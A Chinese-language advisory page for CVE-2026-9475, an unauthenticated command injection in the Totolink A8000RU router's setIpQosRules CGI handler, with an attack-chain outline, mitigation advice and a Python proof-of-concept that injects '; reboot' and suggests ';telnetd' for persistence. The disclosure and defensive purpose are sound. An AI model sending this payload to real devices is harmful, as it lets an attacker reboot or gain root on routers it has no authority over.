CVE-2026-9475 CVSS 9.8 严重

CVE-2026-9475 Totolink A8000RU 命令注入漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9475

漏洞类型

命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Totolink A8000RU

漏洞概述

Totolink A8000RU路由器在特定版本的Web管理接口中存在严重的操作系统命令注入漏洞。该漏洞源于/cgi-bin/cstecgi.cgi文件的setIpQosRules函数未对用户输入的Comment参数进行严格过滤，导致攻击者可构造恶意payload执行任意系统命令。由于漏洞利用无需身份认证且无用户交互要求，远程攻击者可轻易获取设备最高权限，严重影响设备的机密性、完整性和可用性。

技术细节

该漏洞属于典型的操作系统命令注入漏洞，影响Totolink A8000RU路由器的Web管理组件。漏洞触发点位于`/cgi-bin/cstecgi.cgi`脚本中的`setIpQosRules`函数。当设备处理QoS规则设置请求时，程序直接获取HTTP POST请求中的`Comment`参数，并将其未经过滤或转义即传递给后端的系统调用函数（如`system()`）。攻击者可以利用Shell元字符（如`;`、`|`、`&`）闭合原有命令结构，并追加任意恶意指令。由于CVSS向量显示无需权限（PR:N）且无需交互（UI:N），攻击者只需向目标设备发送特制的HTTP数据包即可触发漏洞。成功利用后，攻击者将以Root权限执行命令，完全接管设备。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别Totolink A8000RU设备，确认其Web管理接口（端口80/443）开放且运行易受攻击的固件版本。

STEP 2

漏洞利用

攻击者向/cgi-bin/cstecgi.cgi发送特制的HTTP POST请求，在setIpQosRules函数的Comment参数中注入恶意的Shell命令（如; cmd）。

STEP 3

命令执行

后端CGI脚本直接处理Comment参数，将其传递给系统Shell执行，导致注入的恶意命令在设备上以Root权限运行。

STEP 4

建立控制

攻击者利用执行权限反弹Shell，修改系统配置，植入后门，实现对路由器的长期完全控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    url = f"http://{target_ip}/cgi-bin/cstecgi.cgi"
    # Payload to execute 'reboot' command via injection
    # Change payload to `;telnetd` or similar for persistence
    payload = "; reboot"
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (compatible; PoC/1.0)"
    }
    
    data = {
        "function": "setIpQosRules",
        "Comment": payload,
        "action": "add"
    }
    
    try:
        response = requests.post(url, headers=headers, data=data, timeout=5)
        print(f"[+] Payload sent to {target_ip}")
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with target IP
    exploit(target)

影响范围

Totolink A8000RU 7.1cu.643_b20200521

防御指南

临时缓解措施

如果无法立即升级固件，建议通过防火墙规则禁用路由器Web管理界面的远程访问（WAN侧访问），仅允许受信任的内部网络访问。同时，监控网络流量中是否存在针对/cgi-bin/cstecgi.cgi的异常POST请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9475
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9475
3 Details https://www.cvedetails.com/cve/CVE-2026-9475/
4 VulDB https://vuldb.com/cve/CVE-2026-9475
5 Link https://github.com/Litengzheng/vuldb_new2/blob/main/A8000RU/vul_347/README.md
6 Link https://vuldb.com/submit/813458
7 Link https://vuldb.com/vuln/365456
8 Link https://vuldb.com/vuln/365456/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表